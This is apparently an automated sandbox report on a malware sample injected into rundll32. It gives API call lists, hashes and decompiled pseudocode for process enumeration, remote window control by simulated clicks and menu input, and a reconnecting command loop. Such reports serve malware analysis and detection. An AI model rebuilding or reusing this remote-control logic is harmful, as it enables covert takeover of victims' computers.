                                                            • LocalAlloc.KERNEL32(00000040,00019000), ref: 04644CEE
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 04644D0C
                                                            • OpenProcess.KERNEL32(00000410,00000000,0000022C), ref: 04644D2B
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04644DB0
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04644DB7
                                                            • ProcessIdToSessionId.KERNEL32(?,?), ref: 04644DDA
                                                            • lstrlenW.KERNEL32(?,00000000), ref: 04644E27
                                                            • lstrlenW.KERNEL32(?), ref: 04644E33
                                                            • lstrlenW.KERNEL32(?), ref: 04644E3F
                                                            • lstrlenW.KERNEL32(?), ref: 04644E4B
                                                            • lstrlenW.KERNEL32(?), ref: 04644E5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Process$AddressAllocCreateFirstLibraryLoadLocalOpenProcProcess32SessionSnapshotToolhelp32
                                                            • String ID: IsWow64Process$kernel32.dll
                                                            • API String ID: 1515997778-3024904723
                                                            • Opcode ID: 1ec4c1e19d95be6838f1a814b2cf7f5b9867fb413bcd39d5124679b2a33e2619
                                                            • Instruction ID: 30768663ddbae04baf351c8a5ed347b2435b75317e3d2dd4cf1e2499d75dbc09
                                                            • Opcode Fuzzy Hash: 1ec4c1e19d95be6838f1a814b2cf7f5b9867fb413bcd39d5124679b2a33e2619
                                                            • Instruction Fuzzy Hash: 6BD14DB2504345ABD721DF64DC89BDBB7ECFBC4304F400A2AE589D7150EB74A658CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04636FD0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                                                            				signed int _v8;
                                                            				char _v276;
                                                            				struct _WINDOWPLACEMENT _v320;
                                                            				struct tagRECT _v336;
                                                            				struct HWND__* _v340;
                                                            				struct tagPOINT _v348;
                                                            				struct tagPOINT _v356;
                                                            				int _v360;
                                                            				signed int _t87;
                                                            				unsigned int _t91;
                                                            				signed short _t93;
                                                            				int _t95;
                                                            				struct HWND__* _t106;
                                                            				signed int _t110;
                                                            				int _t123;
                                                            				long _t124;
                                                            				struct HMENU__* _t126;
                                                            				void* _t132;
                                                            				signed short _t139;
                                                            				struct HWND__* _t142;
                                                            				void* _t145;
                                                            				struct tagPOINT _t147;
                                                            				int _t151;
                                                            				int _t154;
                                                            				intOrPtr _t157;
                                                            				long _t158;
                                                            				int _t163;
                                                            				struct HMENU__* _t164;
                                                            				signed short _t166;
                                                            				struct HWND__* _t167;
                                                            				int _t171;
                                                            				struct HWND__* _t172;
                                                            				int _t173;
                                                            				signed int _t176;
                                                            				signed int _t178;
                                                            
                                                            				_t178 = (_t176 & 0xfffffff8) - 0x164;
                                                            				_t87 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t87 ^ _t178;
                                                            				_v360 = 0;
                                                            				_t157 = __ecx;
                                                            				_v348.y = __ecx;
                                                            				if(_a4 + 0xffffff00 > 2) {
                                                            					_t91 = _a12;
                                                            					_t166 =  *(__ecx + 0x78);
                                                            					_t147 = _t91;
                                                            					_t93 = _t91 >> 0x10;
                                                            					_push(_t93);
                                                            					_v360 = 1;
                                                            					_v356.x = _t147;
                                                            					_v356.y = _t93;
                                                            					_v348.x =  *(__ecx + 0x74);
                                                            					 *(__ecx + 0x74) = _t147;
                                                            					 *(__ecx + 0x78) = _t93;
                                                            					_t142 = WindowFromPoint(_t147);
                                                            					_t95 = _a4;
                                                            					if(_t95 != 0x202) {
                                                            						if(_t95 != 0x201) {
                                                            							if(_t95 != 0x200) {
                                                            								goto L2;
                                                            							}
                                                            							_t106 =  *(_t157 + 0x7c);
                                                            							_v340 = _t106;
                                                            							if(_t106 == 0) {
                                                            								goto L2;
                                                            							}
                                                            							_t145 = _v348 - _v356.x;
                                                            							_v360 = _t166 - _v356.y;
                                                            							GetWindowRect(_t106,  &_v336);
                                                            							_t151 = _v336.left;
                                                            							_t171 = _v336.right - _t151;
                                                            							_t154 = _v336.top;
                                                            							_t110 =  *((intOrPtr*)(_v348.y + 0x80)) + 0xfffffffe;
                                                            							_t163 = _v336.bottom - _t154;
                                                            							if(_t110 > 0xf) {
                                                            								L42:
                                                            								MoveWindow(_v340, _t151, _t154, _t171, _t163, 0);
                                                            								goto L11;
                                                            							}
                                                            							switch( *((intOrPtr*)(_t110 * 4 +  &M04637414))) {
                                                            								case 0:
                                                            									MoveWindow(_v340, _t151 - _t145, _t154 - _v360, _t171, _t163, 0);
                                                            									goto L11;
                                                            								case 1:
                                                            									goto L42;
                                                            								case 2:
                                                            									L37:
                                                            									__esi = __ebx + __esi;
                                                            									__ecx = __ecx - __ebx;
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 3:
                                                            									L41:
                                                            									__esi = __esi - __ebx;
                                                            									goto L42;
                                                            								case 4:
                                                            									__edi = __edi + _v360;
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 5:
                                                            									__edx = __edx - _v360;
                                                            									__edi = __edi + _v360;
                                                            									goto L37;
                                                            								case 6:
                                                            									__edx = __edx - _v360;
                                                            									__edi = __edi + _v360;
                                                            									goto L41;
                                                            								case 7:
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 8:
                                                            									__edi = __edi - _v360;
                                                            									__esi = __ebx + __esi;
                                                            									__ecx = __ecx - __ebx;
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 9:
                                                            									__edi = __edi - _v360;
                                                            									goto L41;
                                                            							}
                                                            						}
                                                            						 *(_t157 + 0x7c) = 0;
                                                            						_t172 = FindWindowA("Button", 0);
                                                            						GetWindowRect(_t172,  &_v336);
                                                            						_push(_v356.y);
                                                            						if(PtInRect( &_v336, _v356.x) == 0) {
                                                            							E0465DEA0(_t157,  &_v276, 0, 0x104);
                                                            							_t178 = _t178 + 0xc;
                                                            							RealGetWindowClassA(_t142,  &_v276, 0x104);
                                                            							_t123 = lstrcmpA( &_v276, "#32768");
                                                            							if(_t123 != 0) {
                                                            								_t124 = SendMessageW(_t142, 0x84, 0, _a12);
                                                            								 *(_t157 + 0x80) = _t124;
                                                            								if(_t124 == 2 || _t124 + 0xfffffff6 <= 7) {
                                                            									 *(_t157 + 0x7c) = _t142;
                                                            								}
                                                            								goto L2;
                                                            							}
                                                            							_t126 = SendMessageW(_t142, 0x1e1, _t123, _t123);
                                                            							_push(_v356.y);
                                                            							_t164 = _t126;
                                                            							_t173 = MenuItemFromPoint(0, _t164, _v356.x);
                                                            							GetMenuItemID(_t164, _t173);
                                                            							PostMessageW(_t142, 0x1e5, _t173, 0);
                                                            							PostMessageW(_t142, 0x100, 0xd, 0);
                                                            							goto L11;
                                                            						}
                                                            						PostMessageW(_t172, 0xf5, 0, 0);
                                                            						goto L10;
                                                            					}
                                                            					 *(_t157 + 0x7c) = 0;
                                                            					_t158 = _a12;
                                                            					_t132 = SendMessageW(_t142, 0x84, 0, _t158) + 1;
                                                            					if(_t132 > 0x15) {
                                                            						goto L3;
                                                            					}
                                                            					_t35 = _t132 + 0x46373fc; // 0x4040404
                                                            					switch( *((intOrPtr*)(( *_t35 & 0x000000ff) * 4 +  &M046373E8))) {
                                                            						case 0:
                                                            							SetWindowLongA(_t142, 0xfffffff0, GetWindowLongA(_t142, 0xfffffff0) | 0x08000000);
                                                            							SendMessageW(_t142, 0x84, 0, _t158);
                                                            							goto L3;
                                                            						case 1:
                                                            							PostMessageW(__ebx, 0x112, 0xf020, 0);
                                                            							goto L3;
                                                            						case 2:
                                                            							_v320.length = 0x2c;
                                                            							GetWindowPlacement(__ebx,  &_v320);
                                                            							_push(0);
                                                            							if((_v320.flags & 0x00000003) == 0) {
                                                            								PostMessageW(__ebx, 0x112, 0xf030, ??);
                                                            							} else {
                                                            								PostMessageW(__ebx, 0x112, 0xf120, ??);
                                                            							}
                                                            							goto L3;
                                                            						case 3:
                                                            							PostMessageW(__ebx, 0x10, 0, 0);
                                                            							goto L3;
                                                            						case 4:
                                                            							goto L3;
                                                            					}
                                                            				} else {
                                                            					_v356.x =  *(__ecx + 0x74);
                                                            					_t139 =  *(__ecx + 0x78);
                                                            					_push(_t139);
                                                            					_v356.y = _t139;
                                                            					_t142 = WindowFromPoint( *(__ecx + 0x74));
                                                            					L2:
                                                            					_t158 = _a12;
                                                            					L3:
                                                            					ScreenToClient(_t142,  &_v356);
                                                            					_push(_v356.y);
                                                            					_t167 = ChildWindowFromPoint(_t142, _v356.x);
                                                            					if(_t167 == 0) {
                                                            						L7:
                                                            						if(_v360 != 0) {
                                                            							_t158 = (_v356.y & 0x0000ffff) << 0x00000010 | _v356.x & 0x0000ffff;
                                                            						}
                                                            						PostMessageW(_t142, _a4, _a8, _t158);
                                                            						L10:
                                                            						L11:
                                                            						return E04655AFE(_v8 ^ _t178);
                                                            					}
                                                            					asm("o16 nop [eax+eax]");
                                                            					while(_t167 != _t142) {
                                                            						_t142 = _t167;
                                                            						ScreenToClient(_t167,  &_v356);
                                                            						_push(_v356.y);
                                                            						_t167 = ChildWindowFromPoint(_t167, _v356);
                                                            						if(_t167 != 0) {
                                                            							continue;
                                                            						}
                                                            						goto L7;
                                                            					}
                                                            					goto L7;
                                                            				}
                                                            			}

                                                            APIs
                                                            • WindowFromPoint.USER32(?,?), ref: 0463701E
                                                            • ScreenToClient.USER32(00000000,?), ref: 0463702F
                                                            • ChildWindowFromPoint.USER32(00000000,00000001,00000001), ref: 0463703E
                                                            • ScreenToClient.USER32(00000000,?), ref: 0463705C
                                                            • ChildWindowFromPoint.USER32(00000000,00000001,00000001), ref: 0463706B
                                                            • PostMessageW.USER32(00000000,?,?,?), ref: 04637095
                                                            • WindowFromPoint.USER32 ref: 046370E0
                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0463710F
                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 0463712C
                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0463713B
                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0463714A
                                                            • GetWindowPlacement.USER32(00000000,?), ref: 0463718B
                                                            • FindWindowA.USER32(Button,00000000), ref: 046371DC
                                                            • GetWindowRect.USER32(00000000,?), ref: 046371EA
                                                            • PtInRect.USER32(?,00000001,00000001), ref: 046371FD
                                                            • RealGetWindowClass.USER32(00000000,?,00000104), ref: 04637235
                                                            • lstrcmp.KERNEL32(?,#32768), ref: 04637245
                                                            • SendMessageW.USER32(00000000,000001E1,00000000,00000000), ref: 04637257
                                                            • MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 0463726A
                                                            • GetMenuItemID.USER32(00000000,00000000), ref: 04637274
                                                            • PostMessageW.USER32(00000000,000001E5,00000000,00000000), ref: 04637289
                                                            • PostMessageW.USER32(00000000,00000100,0000000D,00000000), ref: 04637295
                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 046372A7
                                                            • GetWindowRect.USER32(?,?), ref: 046372FC
                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 04637343
                                                            • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 04637360
                                                            • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04637379
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0463739A
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 046373C1
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 046373DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$Message$Move$FromPoint$Send$PostRect$ChildClientItemLongMenuScreen$ClassFindPlacementReallstrcmp
                                                            • String ID: #32768$,$Button
                                                            • API String ID: 4148729706-3823977346
                                                            • Opcode ID: 5586d8dc172052163f259867441932df855797be4348c43ed0f23eb4b192d1b9
                                                            • Instruction ID: dfb2415a65f0ed3d8fd9133f5535e17c442f2f04e0c47a316506d46f09f495c2
                                                            • Opcode Fuzzy Hash: 5586d8dc172052163f259867441932df855797be4348c43ed0f23eb4b192d1b9
                                                            • Instruction Fuzzy Hash: 42B19DB2248341BFD7148F64DC4DF6B7BE8EF88716F009A18F555A6281EB74E804DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			E0464B5F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				short _v204;
                                                            				char _v208;
                                                            				char _v308;
                                                            				char _v309;
                                                            				intOrPtr _v315;
                                                            				char _v316;
                                                            				signed int _v320;
                                                            				char _v340;
                                                            				char _v380;
                                                            				char _v512;
                                                            				void _v516;
                                                            				signed short* _v520;
                                                            				void* _v525;
                                                            				void* _v532;
                                                            				int _v536;
                                                            				void* _v537;
                                                            				signed int _v540;
                                                            				intOrPtr _v544;
                                                            				int _v545;
                                                            				signed short* _v548;
                                                            				void* _v549;
                                                            				void* _v552;
                                                            				signed int _t118;
                                                            				void* _t120;
                                                            				void* _t122;
                                                            				long _t127;
                                                            				void* _t134;
                                                            				signed int _t140;
                                                            				signed int _t143;
                                                            				long _t155;
                                                            				void* _t157;
                                                            				void* _t163;
                                                            				void* _t171;
                                                            				void* _t172;
                                                            				void* _t178;
                                                            				void* _t179;
                                                            				void* _t184;
                                                            				intOrPtr _t186;
                                                            				void* _t188;
                                                            				int _t192;
                                                            				void* _t194;
                                                            				void* _t196;
                                                            				void* _t197;
                                                            				void* _t199;
                                                            				void* _t209;
                                                            				char* _t217;
                                                            				void* _t219;
                                                            				void* _t227;
                                                            				void* _t229;
                                                            				void* _t230;
                                                            				void* _t231;
                                                            				void* _t232;
                                                            				void* _t234;
                                                            				signed int _t240;
                                                            				void* _t247;
                                                            				void* _t253;
                                                            				intOrPtr _t256;
                                                            				void* _t257;
                                                            				long _t261;
                                                            				void* _t263;
                                                            				void* _t265;
                                                            				signed int _t268;
                                                            				signed int _t270;
                                                            				void* _t271;
                                                            				void* _t273;
                                                            				void* _t274;
                                                            
                                                            				_t274 = __eflags;
                                                            				_t242 = __edi;
                                                            				_t270 = (_t268 & 0xfffffff8) - 0x22c;
                                                            				_t118 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t118 ^ _t270;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t120 = L0464ABF0();
                                                            				_v532 = 0;
                                                            				_t253 = _t120;
                                                            				_v536 = 0;
                                                            				L04649390(__ebx,  &_v540, __edi, _t253, _t274, L"Control");
                                                            				if(_v540 != 0 || _t253 != 0 && _v540 != 0) {
                                                            					_t122 = _v532;
                                                            					__eflags = _t122;
                                                            					if(_t122 != 0) {
                                                            						CloseHandle(_t122);
                                                            					}
                                                            					goto L73;
                                                            				} else {
                                                            					SetErrorMode(1);
                                                            					_t127 = GetTickCount();
                                                            					wsprintfA( &_v316, "Global\\%d%d", GetTickCount(), _t127);
                                                            					_t271 = _t270 + 0x10;
                                                            					_t278 = _t253;
                                                            					if(_t253 != 0) {
                                                            						CloseHandle(CreateThread(0, 0, E0464C0A0, 0, 0, 0));
                                                            						if(E0463E880(CloseHandle, _t242, CreateThread, _t278) > 0) {
                                                            							CloseHandle(CreateThread(0, 0, E0463E6E0, 0, 0, 0));
                                                            						}
                                                            					}
                                                            					L0463A330();
                                                            					_t209 = 0;
                                                            					_v552 = 0;
                                                            					while(1) {
                                                            						L7:
                                                            						_t134 = memcpy( &_v516, 0x4686318, 0x31 << 2);
                                                            						_t271 = _t271 + 0xc;
                                                            						asm("movsw");
                                                            						_t281 = _t134;
                                                            						if(_t134 == 0) {
                                                            							_t199 = L04655B14(0x4686318, _t281, 0x3c);
                                                            							_t271 = _t271 + 4;
                                                            							_t134 = E046362B0(_t209, _t199, 0x468637a);
                                                            							 *0x46878d0 = _t134;
                                                            						}
                                                            						if( *((intOrPtr*)(_t134 + 0x38)) != 0) {
                                                            							memcpy( &_v516, 0x46863de, 0x31 << 2);
                                                            							_t271 = _t271 + 0xc;
                                                            							asm("movsw");
                                                            						}
                                                            						_t256 = 0;
                                                            						_v544 = 0;
                                                            						if((_v320 & 0x0000ffff) + 1 == 0) {
                                                            							break;
                                                            						}
                                                            						_t247 = _v552;
                                                            						do {
                                                            							if(_t247 != 0) {
                                                            								E04638C90(_t247);
                                                            								_t147 =  *(_t247 + 0x50);
                                                            								if( *(_t247 + 0x50) != 0) {
                                                            									L04655B0F(_t147);
                                                            									_t271 = _t271 + 4;
                                                            								}
                                                            								 *(_t247 + 0x58) = 0;
                                                            								 *(_t247 + 0x50) = 0;
                                                            								 *(_t247 + 0x54) = 0;
                                                            								 *((intOrPtr*)(_t247 + 0x30)) = 0x467df88;
                                                            								 *((intOrPtr*)(_t247 + 0x28)) = 0x467e008;
                                                            								_t148 =  *((intOrPtr*)(_t247 + 0x1c));
                                                            								if( *((intOrPtr*)(_t247 + 0x1c)) != 0) {
                                                            									L04655B0F(_t148);
                                                            									_t271 = _t271 + 4;
                                                            								}
                                                            								_push(0x60);
                                                            								E04655B47(_t247);
                                                            								_t271 = _t271 + 8;
                                                            								_t247 = 0;
                                                            								_v552 = 0;
                                                            							}
                                                            							if(_t209 != 0) {
                                                            								 *( *_t209)(1);
                                                            								_t209 = 0;
                                                            							}
                                                            							if(_t256 != 0) {
                                                            								E0464B400(_t209,  &_v204, _t247, _t256,  &_v380,  &_v340);
                                                            								_t271 = _t271 + 8;
                                                            								goto L26;
                                                            							} else {
                                                            								_t219 = 0;
                                                            								asm("o16 nop [eax+eax]");
                                                            								do {
                                                            									_t143 =  *(_t271 + _t219 + 0x38) & 0x0000ffff;
                                                            									_t219 = _t219 + 2;
                                                            									 *(_t271 + _t219 + 0x166) = _t143;
                                                            								} while (_t143 != 0);
                                                            								L26:
                                                            								_t140 = 0;
                                                            								_v540 = 0;
                                                            								do {
                                                            									_t257 =  &_v516;
                                                            									_t258 = _t257 + _t140 * 2;
                                                            									_v520 = _t257 + _t140 * 2;
                                                            									if( *(_t257 + _t140 * 2) == 0) {
                                                            										goto L38;
                                                            									}
                                                            									_t217 =  &_v512;
                                                            									_t294 =  *((short*)(_t217 + _t140 * 2));
                                                            									_v548 = _t217 + _t140 * 2;
                                                            									if( *((short*)(_t217 + _t140 * 2)) == 0) {
                                                            										goto L38;
                                                            									}
                                                            									_t247 = L04655B14(_t258, _t294, 0x60);
                                                            									_v552 = _t247;
                                                            									E04637980(_t247);
                                                            									 *((intOrPtr*)(_t247 + 0x28)) = 0x467e048;
                                                            									 *(_t247 + 0x2c) = 0;
                                                            									 *((intOrPtr*)(_t247 + 0x30)) = 0x467e024;
                                                            									 *(_t247 + 0x34) = 0;
                                                            									 *(_t247 + 0x58) = 0;
                                                            									 *(_t247 + 0x50) = 0;
                                                            									 *(_t247 + 0x54) = 0;
                                                            									 *(_t247 + 0x40) = 0;
                                                            									 *(_t247 + 0x20) = 0;
                                                            									 *(_t247 + 0x24) = 0;
                                                            									 *(_t247 + 0x38) = 0;
                                                            									 *((char*)(_t247 + 0x3c)) = 0x43;
                                                            									E04638AE0(_t247,  *_t258 & 0x0000ffff);
                                                            									_t155 = GetTickCount();
                                                            									_t271 = _t271 + 4 - 0xc;
                                                            									_t261 = _t155;
                                                            									_push( *_v552 & 0x0000ffff);
                                                            									_push( &_v208);
                                                            									_t157 = L04638BB0(_t247);
                                                            									_t295 = _t157;
                                                            									if(_t157 == 0) {
                                                            										L37:
                                                            										_t140 = _v540;
                                                            										goto L38;
                                                            									}
                                                            									_v536 = GetTickCount() - _t261;
                                                            									_t209 = L04655B14(_t261, _t295, 0x11c);
                                                            									_t273 = _t271 + 4;
                                                            									_t262 =  *_v520 & 0x0000ffff;
                                                            									_t163 = _v552;
                                                            									 *_t209 = 0x467e8b0;
                                                            									 *((intOrPtr*)(_t209 + 4)) = _t163;
                                                            									 *(_t163 + 0x38) = _t209;
                                                            									 *((intOrPtr*)(_t209 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            									_t69 = _t209 + 0xc; // 0xc
                                                            									 *_t209 = 0x467e1a0;
                                                            									 *0x46878d4 =  *_v520 & 0x0000ffff;
                                                            									lstrcpyA(_t69,  &_v308);
                                                            									lstrcpyW(0x46878d8,  &_v204);
                                                            									_t170 =  *0x46878d0; // 0x0
                                                            									 *0x4684760 =  *_v548 & 0x0000ffff;
                                                            									_t247 = _v552;
                                                            									 *(_t209 + 0x118) = 0;
                                                            									 *(_t209 + 0x114) = 0;
                                                            									 *((char*)(_t209 + 0x110)) = 0;
                                                            									 *(_t247 + 0x38) = _t209;
                                                            									_t296 = _t170;
                                                            									if(_t170 == 0) {
                                                            										_t197 = L04655B14(_t262, _t296, 0x3c);
                                                            										_t273 = _t273 + 4;
                                                            										 *0x46878d0 = E046362B0(_t209, _t197, _t247);
                                                            									}
                                                            									_t227 = _t247;
                                                            									_t171 = E0464B0C0(_t209, _t227, _v536, _t247, _t262, 0x46864a4, L"20220829", L"v20220829",  *((intOrPtr*)(_t170 + 0x30)));
                                                            									_t271 = _t273 + 0x10;
                                                            									if(_t171 == 0) {
                                                            										goto L37;
                                                            									} else {
                                                            										_t263 = 0;
                                                            										while( *((char*)(_t209 + 0x110)) == 0) {
                                                            											Sleep(0x3e8);
                                                            											_t263 = _t263 + 1;
                                                            											if(_t263 < 0x3c) {
                                                            												continue;
                                                            											}
                                                            											if( *((char*)(_t209 + 0x110)) != 0) {
                                                            												break;
                                                            											}
                                                            											goto L37;
                                                            										}
                                                            										__eflags = _t247;
                                                            										if(__eflags == 0) {
                                                            											goto L40;
                                                            										}
                                                            										__eflags = _t209;
                                                            										if(__eflags == 0) {
                                                            											goto L40;
                                                            										}
                                                            										_t172 =  *0x46878d0; // 0x0
                                                            										_v316 = 0xa0;
                                                            										__eflags = _t172;
                                                            										if(__eflags == 0) {
                                                            											_t196 = L04655B14(_t263, __eflags, 0x3c);
                                                            											_t271 = _t271 + 4;
                                                            											_t227 = _t196;
                                                            											_t172 = E046362B0(_t209, _t227, _t247);
                                                            											 *0x46878d0 = _t172;
                                                            										}
                                                            										_push(_t227);
                                                            										_push(0x3f);
                                                            										_v315 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x28)) + 0x14));
                                                            										_push(5);
                                                            										_push( &_v316);
                                                            										E04631C60( *((intOrPtr*)(_t209 + 4)));
                                                            										do {
                                                            											_t178 = OpenEventA(0x1f0003, 0,  &_v309);
                                                            											_t240 =  *(_t247 + 0x5c) & 0x0000ffff;
                                                            											_v549 = _t178;
                                                            											__eflags = _t240 - 1;
                                                            											if(_t240 != 1) {
                                                            												L49:
                                                            												__eflags = _t240 - 2;
                                                            												if(_t240 != 2) {
                                                            													L56:
                                                            													_t179 =  *(_t209 + 0x118);
                                                            													_v537 = _t179;
                                                            													_v545 = 0;
                                                            													__eflags = _t179;
                                                            													if(_t179 == 0) {
                                                            														L61:
                                                            														_t229 =  *0x46878cc; // 0x0
                                                            														__eflags = _t229;
                                                            														if(_t229 != 0) {
                                                            															_t186 =  *((intOrPtr*)(_t229 + 4));
                                                            															__eflags =  *(_t186 + 4);
                                                            															if( *(_t186 + 4) != 0) {
                                                            																 *((char*)(_t229 + 1)) = 0;
                                                            																E0463A290(_t229, _t229);
                                                            																 *0x46878cc = 0;
                                                            															}
                                                            														}
                                                            														_t265 = _v549;
                                                            														__eflags = _t265;
                                                            														if(__eflags == 0) {
                                                            															goto L7;
                                                            														} else {
                                                            															_t230 =  *(_t247 + 0x20);
                                                            															 *(_t247 + 0x44) = 1;
                                                            															__eflags = _t230;
                                                            															if(_t230 != 0) {
                                                            																L68:
                                                            																 *((intOrPtr*)( *_t230 + 4))();
                                                            																L69:
                                                            																CloseHandle(_t265);
                                                            																SetErrorMode(0);
                                                            																_t184 = _v525;
                                                            																__eflags = _t184;
                                                            																if(_t184 != 0) {
                                                            																	CloseHandle(_t184);
                                                            																}
                                                            																L73:
                                                            																__eflags = _v8 ^ _t270;
                                                            																return E04655AFE(_v8 ^ _t270);
                                                            															}
                                                            															_t231 =  *(_t247 + 0x24);
                                                            															__eflags = _t231;
                                                            															if(_t231 == 0) {
                                                            																goto L69;
                                                            															}
                                                            															_t230 = _t231 + 4;
                                                            															__eflags = _t230;
                                                            															goto L68;
                                                            														}
                                                            													} else {
                                                            														goto L57;
                                                            													}
                                                            													while(1) {
                                                            														L57:
                                                            														Sleep(0x3e8);
                                                            														_t188 = OpenEventA(0x1f0003, 1, "Global\\CONN0000000000");
                                                            														__eflags = _t188;
                                                            														if(_t188 != 0) {
                                                            															break;
                                                            														}
                                                            														_t192 = _v545 + 1;
                                                            														_v545 = _t192;
                                                            														__eflags = _t192 - _v537;
                                                            														if(_t192 < _v537) {
                                                            															continue;
                                                            														}
                                                            														goto L61;
                                                            													}
                                                            													CloseHandle(_t188);
                                                            													lstrcpyW(0x46864a4, L"[CONN]");
                                                            													goto L61;
                                                            												}
                                                            												_t232 =  *(_t247 + 0x24);
                                                            												__eflags = _t232;
                                                            												if(_t232 == 0) {
                                                            													goto L56;
                                                            												}
                                                            												_t194 =  *((intOrPtr*)( *((intOrPtr*)(_t232 + 4)) + 0x40))();
                                                            												__eflags = _t194;
                                                            												if(_t194 == 0) {
                                                            													goto L56;
                                                            												}
                                                            												__eflags =  *(_t247 + 0x48);
                                                            												L53:
                                                            												if(__eflags == 0) {
                                                            													goto L56;
                                                            												}
                                                            												goto L54;
                                                            											}
                                                            											_t234 =  *(_t247 + 0x20);
                                                            											__eflags = _t234;
                                                            											if(_t234 == 0) {
                                                            												goto L49;
                                                            											}
                                                            											__eflags =  *((intOrPtr*)( *_t234 + 0x40))();
                                                            											goto L53;
                                                            											L54:
                                                            											Sleep(0x1f4);
                                                            											__eflags = _v549;
                                                            										} while (_v549 == 0);
                                                            										goto L61;
                                                            									}
                                                            									L38:
                                                            									_t140 = _t140 + 1;
                                                            									_v540 = _t140;
                                                            								} while (_t140 < 2);
                                                            							}
                                                            							_t256 = _v544 + 1;
                                                            							_v544 = _t256;
                                                            						} while (_t256 < (_v320 & 0x0000ffff) + 1);
                                                            						break;
                                                            					}
                                                            					L40:
                                                            					Sleep(0x2710);
                                                            					goto L7;
                                                            				}
                                                            			}
                                                            0x0464b77f
                                                            0x0464b77f
                                                            0x0464b782
                                                            0x0464b785
                                                            0x0464b78a
                                                            0x0464b78d
                                                            0x0464b78f
                                                            0x0464b78f
                                                            0x0464b795
                                                            0x0464b79d
                                                            0x0464b79f
                                                            0x0464b79f
                                                            0x0464b7a3
                                                            0x0464b7de
                                                            0x0464b7e3
                                                            0x00000000
                                                            0x0464b7a5
                                                            0x0464b7a5
                                                            0x0464b7a7
                                                            0x0464b7b0
                                                            0x0464b7b0
                                                            0x0464b7b5
                                                            0x0464b7b8
                                                            0x0464b7c0
                                                            0x0464b7e6
                                                            0x0464b7e6
                                                            0x0464b7e8
                                                            0x0464b7f0
                                                            0x0464b7f0
                                                            0x0464b7f9
                                                            0x0464b7fc
                                                            0x0464b800
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b806
                                                            0x0464b80a
                                                            0x0464b812
                                                            0x0464b816
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b826
                                                            0x0464b82b
                                                            0x0464b831
                                                            0x0464b836
                                                            0x0464b83f
                                                            0x0464b846
                                                            0x0464b84d
                                                            0x0464b854
                                                            0x0464b85b
                                                            0x0464b862
                                                            0x0464b86a
                                                            0x0464b871
                                                            0x0464b878
                                                            0x0464b87f
                                                            0x0464b886
                                                            0x0464b88a
                                                            0x0464b88f
                                                            0x0464b899
                                                            0x0464b89c
                                                            0x0464b8a8
                                                            0x0464b8a9
                                                            0x0464b8ac
                                                            0x0464b8b1
                                                            0x0464b8b3
                                                            0x0464b9c6
                                                            0x0464b9c6
                                                            0x00000000
                                                            0x0464b9c6
                                                            0x0464b8c6
                                                            0x0464b8cf
                                                            0x0464b8d1
                                                            0x0464b8da
                                                            0x0464b8ea
                                                            0x0464b8ee
                                                            0x0464b8f4
                                                            0x0464b8f7
                                                            0x0464b900
                                                            0x0464b90b
                                                            0x0464b90e
                                                            0x0464b915
                                                            0x0464b91c
                                                            0x0464b92f
                                                            0x0464b935
                                                            0x0464b93a
                                                            0x0464b941
                                                            0x0464b945
                                                            0x0464b94f
                                                            0x0464b959
                                                            0x0464b960
                                                            0x0464b963
                                                            0x0464b965
                                                            0x0464b969
                                                            0x0464b96e
                                                            0x0464b978
                                                            0x0464b978
                                                            0x0464b984
                                                            0x0464b995
                                                            0x0464b99a
                                                            0x0464b99f
                                                            0x00000000
                                                            0x0464b9a1
                                                            0x0464b9a1
